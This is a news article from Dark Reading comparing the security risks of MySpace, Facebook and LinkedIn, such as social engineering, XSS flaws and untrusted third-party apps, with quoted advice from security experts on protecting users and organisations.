informa
News

Experts: Security Flaws Vary on Social Networking Sites

Though often lumped together, MySpace, Facebook, and LinkedIn each have their own security weaknesses

Individuals are more insulated from spam or worms on LinkedIn than you would be on MySpace -- but your organization may be more susceptible to a targeted attack via the business-oriented social networking site.

This is just one example of the differences in vulnerabilities found in the three most popular social networking sites: MySpace, Facebook, and LinkedIn. Although the three sites have previously been painted with a broad security brush, each carries its own unique risks, experts say. (See Social Networking Gone Bad.)

LinkedIn, which is based on a friend-to-friend-to-friend connection model, could provide a social engineer with a treasure trove of information, including corporate organization charts or email addresses that can lead to spear-phishing attacks.

"You can log onto LinkedIn without authentication and claim to be part of a group, and suddenly you have an organizational chart that is typically confidential information," says Tod Beardsley, lead counter-fraud engineer for TippingPoint. "So it lets you do a Kevin Mitnick-style attack, where you're inserting yourself into a position of trust... This makes the job of social engineering much easier."

LinkedIn's problem isn't as much technology as the common practice of sharing of names, titles, and organizations. "It used to take someone a couple of weeks or a month to get an organizational chart for his attack. Now it's all online," he says.

Once an attacker finds out the names of who works with whom, for instance, he could send a carefully crafted email via LinkedIn to the victim's HR department head, posing as a headhunter recommending a candidate for an open position. But his email could carry a malicious Word file, rather than a resume. When opened, the file could gain ownership of the HR rep's PC and steal other company information, says Graham Cluley, senior technology consultant for Sophos.

"Information about how people are connected, the work they do, and their positions, is all gold dust to the committed identity thief or targeted attacker," Cluley says. "It gives them the stepping stones to commit identity theft" or other breaches, he says.

And because LinkedIn and other social networking sites let users authenticate to the site using an email address, they open up another potential hole for an attacker. "LinkedIn suffers from the same problem as a lot of other social networking sites -- they do a lot of authentication based on unauthenticated email," TippingPoint's Beardsley says. A user can click onto the "forgot my password" button to reset a password, for instance.

"The problem here is you're relying on email security as well as your social networking site security," he says. "Both have to work well."

But LinkedIn is generally safer than MySpace and Facebook, mainly because it's less feature-rich and thus opens fewer potential attack vectors, experts say.

MySpace was one of the first social networking sites, and it's still the largest, with over 200 million accounts worldwide. Its sheer size has made it an obvious target for spammers, hackers, and online predators.

Aside from the big bull's eye on its back, though, MySpace is also a victim of its own business model, where the user controls his or her content and presentation. Users can add banners to their pages, and embed other Web technologies and links: "There's lots of opportunities to link to dangerous things and to embed malware on those pages," Sophos's Cluley says.

MySpace is regularly pummeled with spam, and has had some cross-site scripting (XSS) flaws exposed, including one recently presented at Black Hat USA this summer. And one XSS bug on MySpace can go a long way for a spammer: "A nice cross-site scripting bug can compromise hundreds of thousands of browsers in an hour. It's super-useful for spammers, as well as people running botnets," TippingPoint's Beardsley says. (See Hackers Reveal Vulnerable Websites, Zero Day Flaw Found in MySpace and MySpace Under Siege.)

Aside from the infamous Samy worm attack last year on MySpace, the site also has reportedly had trouble keeping some private data private: "MySpace had several problems with password-leaking, too... Apparently, they don’t have a lot of control on particular user information," Beardsley says.

Facebook, meanwhile, is rapidly growing, with around 52 million users, and according to Sophos, and Facebook-related traffic accounts for 30 percent of Internet traffic in some organziations. Unlike MySpace, it gives users more of a cookie-cutter approach for their profiles. "It's harder to craft a persistent attack on Facebook" because of that structure, Beardsley says.

"Part of the reason Facebook is so popular is that many users were put off by the anarchy of MySpace, and see Facebook as more controlled and conservative," Sophos' Cluley says. "But that's not to say Facebook is a 100 percent safe place." (See Facebook Gets a Little Too Social.)

As a matter of fact, Facebook's reliance on third-party Java applications has its tradeoffs as well. With Java, the user is not only entrusting Facebook with his logon and password, but also must trust the third-party apps that provide tools for Facebook users. Beardsley says signing up for these apps often requires that the user provide his or her user name and password so that the third-party code can be added to his or her profile.

"There's no real way of determining if they kept that [data] forever, or if it's in an encrypted format," Beardsley says. "You're basically giving up your user name and password."

Cluley says Facebook doesn't actually approve the third-party apps -- he even wrote a Facebook app of his own. "There's the danger that the code you're running on the site there is malicious or could point you to a site that contains malware," he says.

There are some temptingly fun tools for Facebook, such as apps that let you virtually "bite" your friend and turn him into a zombie, throw croissants at him, or buy him a round of drinks. "The tools and content are getting richer, but there seems to be more control over [the content] in Facebook," Cluley says.

The simple rule of thumb for any social networking Website: Don't share any information unless it's absolutely necessary, security experts say. There's an app on Facebook that reveals what your porn-actor or pole-dancer name would be based on information you supply -- such as your mother's maiden name, and the name of your first pet.

"We know lots of email sites and online banking sites ask you to confirm these kinds of things when you get your password," which means that data could eventually be used to steal information from you, Cluley says.

Still, 87 percent of Facebook users recently surveyed by Sophos admitted to providing education and work details in their profiles. Seventy-eight percent have provided their current address or location. The study also found that nearly half of companies are now blocking access to the social networking site for productivity reasons, as well as security concerns.

Another way social networking users can protect themselves is to avoid clicking on links within a profile. "For starters, I don't click on anything... on MySpace," Beardsley says. "The user controls the entire style sheet, so you can't trust anything."

And be selective about who can view your profile. "'Link in' only with people you are certain are your friends," Cluley says. "If someone who says they want to link in with me isn't someone I'd ever invite for dinner, I may feel awkward about rejecting them," but it's better to be safe than to worry about hurting someone's feelings, he says.

As for social networking at work, businesses need to step up and set their policy on visiting these sites during work hours, experts say. "They have NDAs in blogs, but their users are giving up secrets" on MySpace, Beardsley says.

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.

  • TippingPoint Technologies Inc.
  • Sophos plc

  • Recommended Reading: